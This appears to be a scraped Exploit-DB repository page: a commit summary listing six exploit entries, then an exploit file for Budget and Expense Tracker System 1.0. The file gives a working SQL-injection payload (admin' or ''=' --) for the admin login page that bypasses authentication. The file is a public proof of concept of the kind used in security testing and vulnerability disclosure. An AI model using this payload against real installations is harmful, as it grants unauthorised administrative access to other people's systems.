5cc446a25f
6 changes to exploits/shellcodes T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Budget and Expense Tracker System 1.0 - Authenticated Bypass
19 lines
No EOL
761 B
Text
19 lines
No EOL
761 B
Text
# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
|
|
# Exploit Author: Prunier Charles-Yves
|
|
# Date: September 20, 2021
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
|
|
# Tested on: Linux, windows
|
|
# Vendor: oretnom23
|
|
# Version: v1.0
|
|
|
|
# Exploit Description:
|
|
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
|
|
allowing the attacker to login with admin acount
|
|
|
|
|
|
----- PoC: Authentication Bypass -----
|
|
|
|
Administration Panel: http://localhost/expense_budget/admin/login.php
|
|
|
|
Username: admin' or ''=' -- |